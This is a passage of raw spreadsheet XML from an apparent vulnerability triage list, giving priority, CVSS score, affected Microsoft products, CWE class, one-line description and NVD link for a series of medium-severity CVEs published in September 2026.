r="D1093" s="5" t="n"><v>6.5</v></c><c r="E1093" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1093" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1093" s="5" t="inlineStr" /><c r="H1093" s="5" t="n"><v>0.007</v></c><c r="I1093" s="5" t="inlineStr" /><c r="J1093" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1093" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1093" s="5" t="inlineStr" /><c r="M1093" s="5" t="inlineStr" /><c r="N1093" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1093" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1093" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1093" s="5" t="inlineStr" /><c r="R1093" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1093" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1093" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68778</t></is></c></row><row r="1094"><c r="A1094" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1094" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1094" s="5" t="inlineStr"><is><t>CVE-2026-68779</t></is></c><c r="D1094" s="5" t="n"><v>6.5</v></c><c r="E1094" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1094" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1094" s="5" t="inlineStr" /><c r="H1094" s="5" t="n"><v>0.006</v></c><c r="I1094" s="5" t="inlineStr" /><c r="J1094" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1094" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1094" s="5" t="inlineStr" /><c r="M1094" s="5" t="inlineStr" /><c r="N1094" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1094" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1094" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1094" s="5" t="inlineStr" /><c r="R1094" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1094" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1094" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68779</t></is></c></row><row r="1095"><c r="A1095" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1095" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1095" s="5" t="inlineStr"><is><t>CVE-2026-68780</t></is></c><c r="D1095" s="5" t="n"><v>6.5</v></c><c r="E1095" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1095" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1095" s="5" t="inlineStr" /><c r="H1095" s="5" t="n"><v>0.007</v></c><c r="I1095" s="5" t="inlineStr" /><c r="J1095" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1095" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1095" s="5" t="inlineStr" /><c r="M1095" s="5" t="inlineStr" /><c r="N1095" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1095" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1095" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1095" s="5" t="inlineStr" /><c r="R1095" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1095" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1095" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68780</t></is></c></row><row r="1096"><c r="A1096" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1096" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1096" s="5" t="inlineStr"><is><t>CVE-2026-68781</t></is></c><c r="D1096" s="5" t="n"><v>6.5</v></c><c r="E1096" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1096" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1096" s="5" t="inlineStr" /><c r="H1096" s="5" t="n"><v>0.007</v></c><c r="I1096" s="5" t="inlineStr" /><c r="J1096" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1096" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1096" s="5" t="inlineStr" /><c r="M1096" s="5" t="inlineStr" /><c r="N1096" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1096" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1096" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1096" s="5" t="inlineStr" /><c r="R1096" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1096" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1096" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68781</t></is></c></row><row r="1097"><c r="A1097" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1097" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1097" s="5" t="inlineStr"><is><t>CVE-2026-68784</t></is></c><c r="D1097" s="5" t="n"><v>6.5</v></c><c r="E1097" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1097" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1097" s="5" t="inlineStr" /><c r="H1097" s="5" t="n"><v>0.007</v></c><c r="I1097" s="5" t="inlineStr" /><c r="J1097" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1097" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1097" s="5" t="inlineStr" /><c r="M1097" s="5" t="inlineStr" /><c r="N1097" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1097" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1097" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1097" s="5" t="inlineStr" /><c r="R1097" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1097" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1097" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68784</t></is></c></row><row r="1098"><c r="A1098" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1098" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1098" s="5" t="inlineStr"><is><t>CVE-2026-68898</t></is></c><c r="D1098" s="5" t="n"><v>6.5</v></c><c r="E1098" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1098" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1098" s="5" t="inlineStr" /><c r="H1098" s="5" t="n"><v>0.006</v></c><c r="I1098" s="5" t="inlineStr" /><c r="J1098" s="5" t="inlineStr" /><c r="K1098" s="5" t="inlineStr" /><c r="L1098" s="5" t="inlineStr" /><c r="M1098" s="5" t="inlineStr" /><c r="N1098" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1098" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1098" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1098" s="5" t="inlineStr" /><c r="R1098" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1098" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows iSCSI allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1098" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68898</t></is></c></row><row r="1099"><c r="A1099" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1099" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1099" s="5" t="inlineStr"><is><t>CVE-2026-69267</t></is></c><c r="D1099" s="5" t="n"><v>6.5</v></c><c r="E1099" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1099" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1099" s="5" t="inlineStr" /><c r="H1099" s="5" t="n"><v>0.003</v></c><c r="I1099" s="5" t="inlineStr" /><c r="J1099" s="5" t="inlineStr" /><c r="K1099" s="5" t="inlineStr" /><c r="L1099" s="5" t="inlineStr" /><c r="M1099" s="5" t="inlineStr" /><c r="N1099" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1099" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1099" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1099" s="5" t="inlineStr" /><c r="R1099" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="S1099" s="5" t="inlineStr"><is><t>Insufficient granularity of access control in Windows Connected User Experiences and Telemetry allows an authorized attacker to disclose information locally.</t></is></c><c r="T1099" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69267</t></is></c></row><row r="1100"><c r="A1100" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1100" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1100" s="5" t="inlineStr"><is><t>CVE-2026-69297</t></is></c><c r="D1100" s="5" t="n"><v>6.5</v></c><c r="E1100" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1100" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1100" s="5" t="inlineStr" /><c r="H1100" s="5" t="n"><v>0.006</v></c><c r="I1100" s="5" t="inlineStr" /><c r="J1100" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1100" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1100" s="5" t="inlineStr" /><c r="M1100" s="5" t="inlineStr" /><c r="N1100" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1100" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1100" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1100" s="5" t="inlineStr" /><c r="R1100" s="5" t="inlineStr"><is><t>CWE-257</t></is></c><c r="S1100" s="5" t="inlineStr"><is><t>Storing passwords in a recoverable format in Windows DHCP Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1100" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69297</t></is></c></row><row r="1101"><c r="A1101" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1101" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1101" s="5" t="inlineStr"><is><t>CVE-2026-69361</t></is></c><c r="D1101" s="5" t="n"><v>6.5</v></c><c r="E1101" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1101" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1101" s="5" t="inlineStr" /><c r="H1101" s="5" t="n"><v>0.008</v></c><c r="I1101" s="5" t="inlineStr" /><c r="J1101" s="5" t="inlineStr" /><c r="K1101" s="5" t="inlineStr" /><c r="L1101" s="5" t="inlineStr" /><c r="M1101" s="5" t="inlineStr" /><c r="N1101" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1101" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1101" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1101" s="5" t="inlineStr" /><c r="R1101" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1101" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Microsoft Exchange Server allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T1101" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69361</t></is></c></row><row r="1102"><c r="A1102" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1102" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1102" s="5" t="inlineStr"><is><t>CVE-2026-69374</t></is></c><c r="D1102" s="5" t="n"><v>6.5</v></c><c r="E1102" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1102" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1102" s="5" t="inlineStr" /><c r="H1102" s="5" t="n"><v>0.011</v></c><c r="I1102" s="5" t="inlineStr" /><c r="J1102" s="5" t="inlineStr" /><c r="K1102" s="5" t="inlineStr" /><c r="L1102" s="5" t="inlineStr" /><c r="M1102" s="5" t="inlineStr" /><c r="N1102" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1102" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1102" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1102" s="5" t="inlineStr" /><c r="R1102" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S1102" s="5" t="inlineStr"><is><t>Allocation of resources without limits or throttling in Windows SMB Server allows an authorized attacker to deny service over a network.</t></is></c><c r="T1102" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69374</t></is></c></row><row r="1103"><c r="A1103" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1103" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1103" s="5" t="inlineStr"><is><t>CVE-2026-69375</t></is></c><c r="D1103" s="5" t="n"><v>6.5</v></c><c r="E1103" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1103" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1103" s="5" t="inlineStr" /><c r="H1103" s="5" t="n"><v>0.006</v></c><c r="I1103" s="5" t="inlineStr" /><c r="J1103" s="5" t="inlineStr" /><c r="K1103" s="5" t="inlineStr" /><c r="L1103" s="5" t="inlineStr" /><c r="M1103" s="5" t="inlineStr" /><c r="N1103" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1103" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1103" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1103" s="5" t="inlineStr" /><c r="R1103" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S1103" s="5" t="inlineStr"><is><t>Authorization bypass through user-controlled key in Microsoft Exchange Server allows an authorized attacker to perform tampering over a network.</t></is></c><c r="T1103" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69375</t></is></c></row><row r="1104"><c r="A1104" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1104" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1104" s="5" t="inlineStr"><is><t>CVE-2026-69395</t></is></c><c r="D1104" s="5" t="n"><v>6.5</v></c><c r="E1104" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1104" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1104" s="5" t="inlineStr" /><c r="H1104" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1104" s="5" t="inlineStr" /><c r="J1104" s="5" t="inlineStr" /><c r="K1104" s="5" t="inlineStr" /><c r="L1104" s="5" t="inlineStr" /><c r="M1104" s="5" t="inlineStr" /><c r="N1104" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1104" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1104" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1104" s="5" t="inlineStr" /><c r="R1104" s="5" t="inlineStr"><is><t>CWE-134</t></is></c><c r="S1104" s="5" t="inlineStr"><is><t>Use of externally-controlled format string in Active Directory Certificate Services (AD CS) allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1104" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69395</t></is></c></row><row r="1105"><c r="A1105" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1105" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1105" s="5" t="inlineStr"><is><t>CVE-2026-69409</t></is></c><c r="D1105" s="5" t="n"><v>6.5</v></c><c r="E1105" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1105" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1105" s="5" t="inlineStr" /><c r="H1105" s="5" t="n"><v>0.01</v></c><c r="I1105" s="5" t="inlineStr" /><c r="J1105" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1105" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1105" s="5" t="inlineStr" /><c r="M1105" s="5" t="inlineStr" /><c r="N1105" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1105" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1105" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1105" s="5" t="inlineStr" /><c r="R1105" s="5" t="inlineStr"><is><t>CWE-250</t></is></c><c r="S1105" s="5" t="inlineStr"><is><t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1105" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69409</t></is></c></row><row r="1106"><c r="A1106" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1106" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1106" s="5" t="inlineStr"><is><t>CVE-2026-69497</t></is></c><c r="D1106" s="5" t="n"><v>6.5</v></c><c r="E1106" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1106" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1106" s="5" t="inlineStr" /><c r="H1106" s="5" t="n"><v>0.011</v></c><c r="I1106" s="5" t="inlineStr" /><c r="J1106" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1106" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1106" s="5" t="inlineStr" /><c r="M1106" s="5" t="inlineStr" /><c r="N1106" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1106" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1106" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1106" s="5" t="inlineStr" /><c r="R1106" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S1106" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows DHCP Server allows an authorized attacker to deny service over a network.</t></is></c><c r="T1106" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69497</t></is></c></row><row r="1107"><c r="A1107" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1107" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1107" s="5" t="inlineStr"><is><t>CVE-2026-69562</t></is></c><c r="D1107" s="5" t="n"><v>6.5</v></c><c r="E1107" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1107" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1107" s="5" t="inlineStr" /><c r="H1107" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1107" s="5" t="inlineStr" /><c r="J1107" s="5" t="inlineStr" /><c r="K1107" s="5" t="inlineStr" /><c r="L1107" s="5" t="inlineStr" /><c r="M1107" s="5" t="inlineStr" /><c r="N1107" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1107" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1107" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1107" s="5" t="inlineStr" /><c r="R1107" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1107" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1107" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69562</t></is></c></row><row r="1108"><c r="A1108" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1108" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1108" s="5" t="inlineStr"><is><t>CVE-2026-69624</t></is></c><c r="D1108" s="5" t="n"><v>6.5</v></c><c r="E1108" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1108" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1108" s="5" t="inlineStr" /><c r="H1108" s="5" t="n"><v>0.007</v></c><c r="I1108" s="5" t="inlineStr" /><c r="J1108" s="5" t="inlineStr" /><c r="K1108" s="5" t="inlineStr" /><c r="L1108" s="5" t="inlineStr" /><c r="M1108" s="5" t="inlineStr" /><c r="N1108" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1108" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1108" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1108" s="5" t="inlineStr" /><c r="R1108" s="5" t="inlineStr"><is><t>CWE-184</t></is></c><c r="S1108" s="5" t="inlineStr"><is><t>Incomplete list of disallowed inputs in Active Directory Certificate Services (AD CS) allows an authorized attacker to perform tampering over a network.</t></is></c><c r="T1108" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69624</t></is></c></row><row r="1109"><c r="A1109" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1109" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1109" s="5" t="inlineStr"><is><t>CVE-2026-69626</t></is></c><c r="D1109" s="5" t="n"><v>6.5</v></c><c r="E1109" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1109" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1109" s="5" t="inlineStr" /><c r="H1109" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1109" s="5" t="inlineStr" /><c r="J1109" s="5" t="inlineStr" /><c r="K1109" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1109" s="5" t="inlineStr" /><c r="M1109" s="5" t="inlineStr" /><c r="N1109" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1109" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1109" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1109" s="5" t="inlineStr" /><c r="R1109" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1109" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1109" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69626</t></is></c></row><row r="1110"><c r="A1110" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1110" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1110" s="5" t="inlineStr"><is><t>CVE-2026-69636</t></is></c><c r="D1110" s="5" t="n"><v>6.5</v></c><c r="E1110" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1110" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1110" s="5" t="inlineStr" /><c r="H1110" s="5" t="n"><v>0.01</v></c><c r="I1110" s="5" t="inlineStr" /><c r="J1110" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1110" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1110" s="5" t="inlineStr" /><c r="M1110" s="5" t="inlineStr" /><c r="N1110" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1110" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1110" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1110" s="5" t="inlineStr" /><c r="R1110" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S1110" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1110" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69636</t></is></c></row><row r="1111"><c r="A1111" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1111" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1111" s="5" t="inlineStr"><is><t>CVE-2026-69719</t></is></c><c r="D1111" s="5" t="n"><v>6.5</v></c><c r="E1111" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1111" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1111" s="5" t="inlineStr" /><c r="H1111" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1111" s="5" t="inlineStr" /><c r="J1111" s="5" t="inlineStr" /><c r="K1111" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1111" s="5" t="inlineStr" /><c r="M1111" s="5" t="inlineStr" /><c r="N1111" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1111" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1111" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1111" s="5" t="inlineStr" /><c r="R1111" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1111" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1111" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69719</t></is></c></row><row r="1112"><c r="A1112" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1112" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1112" s="5" t="inlineStr"><is><t>CVE-2026-69734</t></is></c><c r="D1112" s="5" t="n"><v>6.5</v></c><c r="E1112" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1112" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1112" s="5" t="inlineStr" /><c r="H1112" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1112" s="5" t="inlineStr" /><c r="J1112" s="5" t="inlineStr" /><c r="K1112" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1112" s="5" t="inlineStr" /><c r="M1112" s="5" t="inlineStr" /><c r="N1112" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1112" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1112" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1112" s="5" t="inlineStr" /><c r="R1112" s="5" t="inlineStr"><is><t>CWE-125, CWE-190</t></is></c><c r="S1112" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1112" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69734</t></is></c></row><row r="1113"><c r="A1113" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1113" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1113" s="5" t="inlineStr"><is><t>CVE-2026-69781</t></is></c><c r="D1113" s="5" t="n"><v>6.5</v></c><c r="E1113" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1113" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1113" s="5" t="inlineStr" /><c r="H1113" s="5" t="n"><v>0.005</v></c><c r="I1113" s="5" t="inlineStr" /><c r="J1113" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1113" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1113" s="5" t="inlineStr" /><c r="M1113" s="5" t="inlineStr" /><c r="N1113" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1113" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1113" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1113" s="5" t="inlineStr" /><c r="R1113" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S1113" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in 